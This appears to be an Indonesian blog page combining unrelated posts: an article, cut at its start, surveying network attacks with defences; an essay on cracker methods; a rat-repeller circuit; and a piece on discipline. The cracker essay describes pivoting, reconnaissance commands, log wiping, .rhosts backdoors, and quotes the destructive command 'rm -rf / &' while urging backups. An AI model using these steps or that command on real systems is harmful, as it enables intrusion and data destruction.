serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker
menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password
umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat
penemuan password sebelum network admin menyadari adanya serangan.
Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada
dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh
lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan
mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak
tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan
password).
Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang
system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk
network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang
salah berulangkali dan akhirnya mengunci account admin ☺. Ketika sang admin sedang berusaha untuk
mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system.
Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di
dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah
kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-force

dictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi
dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan
program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah
dengan memonitor kewenangan akses pada file.
Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat
mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang
dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut
tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada
HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau
juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk
memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bisa
menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika
attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan
DDOS(distributed denial of service) secara anoymous untuk menyerang network lain.
Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan
mengakibatkan kerawanan yang sama dengan proxy server.
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.
11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.
Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang
network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau
banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan
dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX,
informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data
ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.
Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol
tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya
memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049
seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix)
seharusnya di catat dalam log.

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.
Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program
seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat
menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware
dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai
berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan
mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut
sandboxes.
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception
TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet
milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut
saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali
algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bisa
digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya
memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP
Spoofing.
Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file
yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan.
Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di
system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik
yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya
dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak
dikembalikan.
Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi
bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker
mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket- paket palsu. System
sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt.
Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke
server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa
dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk
mendeface website.
Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan
semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion.
Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang
tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan
perintah secara remote (remote command priviledges).
Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies
antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll.
Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti
nomor credit card dan password.
Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan
cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to
live).
Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada
kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website.
Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection
system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan
untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi
sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek
security pada system sendiri dan metode lain.
Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall
firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari
serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan
itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...:)

Biografi Penulis
Reza Muhammad, Lahir di Kota serba Berantakan: Jakarta 19 Januari 1984. Menamatkan SMU di
SMUN 2 Bekasi bersama Mr. G-deg <Tn. Akeda>. Sedang menyelesaikan kuliah S1 di UIN
Syarifhidayatullah Jakarta Jurusan Teknik Informatika. lagi getol-getolnya ngoprek MFC untuk porting
“Program Susah”. Saat ini sedang mendalami Security Linux dan Jaringan.
Informasi Lebih Lanjut tentang Penulis Bisa didapat melalui:
URL: http://www.brainbench.com/transcript.jsp?pid=4351894
Email : withoutfx@telkom.net

Read More

Belajar Menjadi Hacker

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.
Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk

http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah 'ls <domain or network>' , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn <user>', dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan).

Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm –rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Dikutip dari : Ebook Pak Onno

Read More

Membuat Rangkaian Ultrasonic

Salah satu hama utama yang menyerang tanaman padi adalah tikus yang menyebabkan kerugian yang tidak sedikit pada areal persawahan padi. Dalam rangka pencegahan hama tikus pada tanaman padi, telah dilakukan beberapa pencegahan melalui beberapa cara yaitu dengan pengendalian kultur teknis, pengendalian dengan sanitasi, pengendalian fisik dan mekanis, pengendalian biologis, serta pengendalian kimia. Cara pemberantasan hama tersebut relatif cepat dan praktis, tetapi sering kali menimbulkan efek samping, karena jika penggunaannya tidak hati-hati dapat membahayakan kesehatan manusia atau organisme lain, juga dapat mengganggu keseimbangan alam. Untuk itu dirancang teknologi baru dengan menggunakan gelombang elektromagnetik yang dapat menghasilkan suara ultrasonik. Suara ini memiliki frekuensi lebih dari 20 KHz, hanya sedikit hewan yang mampu mendengar jenis suara ini,  salah satunya adalah tikus.
Berikut ini adalah skema rangkaian pengusir tikus dengan output gelombang ultrasonik sebesar 50 KHz.

Inti dari rangkaian ini adalah IC 555 yang berfungsi sebagai timer dan dikombinasikan dengan dua resistor dan kapasitor yang akan menghasilkan frekuensi 50 KHz. Komponen pendukung yang dibutuhan tidak terlalu banyak, mudah didapat di toko-toko elektronik dan harganya cukup murah.
Secara sederhana, prinsip kerja dari rangkaian pengusir tikus adalah sebuah oscilator yang mengeluarkan gelombang ultrasonik pada kisaran frekuensi 20 - 40 KHz. Gelombang ultrasonik yang dihasilkannya tidak akan terdengar di telinga manusia, tetapi akan sangat mengganggu dan menyebabkan ketidaknyamanan pada tikus. Base frekuensi lalu dimodulir dengan sinyal 50 Hz yang didapat dari frekuensi tegangan jala-jala PLN melalui kapasitor C4 (untuk menghindari tikus menjadi kebal terhadap alat ini) sehingga akan dihasilkan ayunan frekuensi antara 20 - 40 KHz secara periodik.
Buat temen-temen yang tertari untuk mencoba, berikut ini daftar komponen elektronika yang dibutuhkan untuk membuat rangkaian seperti di atas:

• R1............... 1K
• R2............... 15K
• R3............... 15K
• C1............... 1nF
• C2............... 1uF/16V
• C3............... 10nF
• C4............... 220nF
• C5............... 1000uF/16V
• D1 - D4....... 1N 4001
• IC ................. 555
• Trafo ............ 6V/200mA
• Sp ................. speaker tweeter bentuk corong

Pengusir tikus elektronik ini efektif untuk ruangan seluas maksimal 200 m2 asal penempatannya tepat, misalnya di pojok atas ruangan agar frekuensi noise-nya bisa menyebar ke seluruh ruangan tanpa halangan. Nyalakan secara terus menerus untuk menjaga agar tikus tidak datang lagi, tidak usah khawatir dengan konsumsi listriknya karena daya listrik yang dibutuhkan cukup rendah, lebih kecil dari lampu bohlam 5 watt/220 volt.

Untuk aplikasi di sawah, buatlah tiang penyangga. Jarak antara tiang satu dengan lainnya berjarak 400 meter. Gunakan amplifier jika speaker yang digunakan lebih dari 2 buah. Alat harus dinyalakan terus menerus agar tidak ada kesempatan untuk tiku kembalii. Tambahkan alat penangkal petir agar ultrasonik aman digunakan disaat hujan turun disertai petir dan bungkus rangkaian agar aman dari air.

Semoga bermanfaat...

Read More

Disiplin

Disiplin sama pentingnya dengan visi, kendati dalam urutannya dia saya taruh di nomor dua. Disiplin itu mewakili "ciptaan yang kedua" (setelah ciptaan pertama dalam bentuk visi). Disiplin itu adalah pelaksanaannya, yang membuat terjadi, suatu pengorbanan yang mau tak mau harus kita lakukan untuk mewujudkan visi. Disiplin adalah kekuatan kehendak yang diwujudkan dalam tindakan. Peter Drucker mengatakan bahwa tugas utama seorang manajer adalah menentukan realitas. Disiplin menentukan realitas dan menerimanya. Disiplin berarti kesediaan untuk secara total membenamkan diri di dalam realitas, dan bukannya menolak atau menyangkalnya. Disiplin berarti mengakui fakta keras sebagaimana adanya.

Tanpa visi dan pengharapan, menerima realitas itu bisa membuat kita tertekan dan patah semangat. Kebahagiaan kadang-kadang didefinisikan sebagai kemampuan untuk mengalahkan apa yang Anda kehendaki sekarang terhadap apa yang Anda inginkan di belakang hari. Nah, disiplin tidak lain adalah pengorbanan pribadi ini—yaitu proses mengalahkan kesenangan sekarang demi kebaikan yang lebih besar dan berjangka panjang.
Banyak orang menyamakan disiplin dengan tiadanya kebebasan. Katanya, "keharusan membunuh spontanitas." Lagi, "tak ada kebebasan dalam keharusan." "Saya ingin melakukan apa yang saya inginkan. Itulah kebebasan, bukan tugas."
Pada kenyataannya, sebaliknyalah yang benar. Hanya orang-orang yang disiplin yang benar-benar bebas. Orang-orang yang tidak disiplin adalah budak dari suasana hatinya, budak kesenangan dan nafsu-nafsunya.
Anda dapat main piano? Saya tidak. Saya tidak memiliki kebebasan untuk memainkan piano, karena saya tidak pernah mendisiplinkan diri saya untuk itu. Saya dulu lebih suka bermain dengan teman-teman daripada latihan piano sebagaimana diharapkan oleh orangtua dan guru saya. Saya kira saya tidak pernah mem-bayangkan diri sebagai pemain piano. Waktu itu saya tidak pernah mengerti apa artinya menjadi pemain piano, sebentuk kebebasan untuk menciptakan seni luar biasa yang akan amat bermanfaat bagi diri saya sendiri maupun bagi orang lain, sepanjang hidup saya.

Bagaimana tentang kebebasan untuk memaafkan dan untuk minta maaf? Bagaimana tentang kebebasan untuk mencintai tanpa pamrih; untuk menjadi cahaya penerang, dan bukan hakim; menjadi teladan, dan bukan tukang kritik? Pikirkan disiplin yang terlibat di situ. Disiplin muncul dari kesediaan untuk "tunduk pada bimbingan" seseorang atau suatu tujuan.
Seorang pendidik besar, Horace Mann, pernah bilang, "Sia-sia mereka bicara mengenai kebahagiaan, bila mereka tidak mengalahkan dorongan hatinya untuk tunduk pada prinsip. Orang yang tidak pernah mengorbankan masa kininya demi kebaikan di masa mendatang, atau tidak pernah mengorbankan kepentingan dirinya demi kepentingan umum, dapat bicara mengenai kebahagiaan hanya seperti orang buta yang bicara mengenai warna."
Saya ingat pergolakan batin yang saya hadapi sebagai dosen berumur lima puluh tahun ketika harus memutuskan untuk meninggalkan surga yang aman, dan zona kenyamanan saya sebagai pengajar universitas, untuk membangun bisnis pribadi. Kalau bukan karena visi mengenai manfaat yang lebih besar yang bakal saya perbuat, kami tidak akan pernah punya disiplin untuk mulai proses yang penuh dengan pengorbanan diri untuk membangun bisnis baru, mengambil hipotek kedua, dan bergelimang utang. Saking sulitnya keuangan kami, kami bahkan sampai punya semboyan praktis, "Kebahagiaan adalah arus kas positif", dan kelabakan selama bertahun-tahun setiap kali tiba saatnya harus menggaji pegawai. Kami tidak akan pernah bisa bertahan menghadapi kesulitan seperti ini bila kami tidak punya visi mengenai apa yang mungkin, dan disiplin untuk tetap berjuang di situ.
Saya benar-benar yakin bahwa disiplin adalah ciri yang umum pada semua orang yang sukses. Saya mengagumi karya eksekutif asuransi, Albert E.N. Gray, yang memanfaatkan seluruh hidupnya untuk menemukan ciri umum yang menentukan kesuksesan. Akhirnya dia sampai pada pemahaman yang sederhana, tetapi mendalam, bahwa kendati kerja keras, keberuntungan dan hubungan-hubungan yang baik juga penting, orang yang sukses telah "membangun kebiasaan untuk melakukan hal-hal yang tidak disukai oleh orang-orang yang gagal."7 Orang-orang sukses juga tidak suka melakukan hal-hal itu, tetapi mereka mengatasi ketidaksukaan mereka demi terwujudnya tujuan mereka.

Read More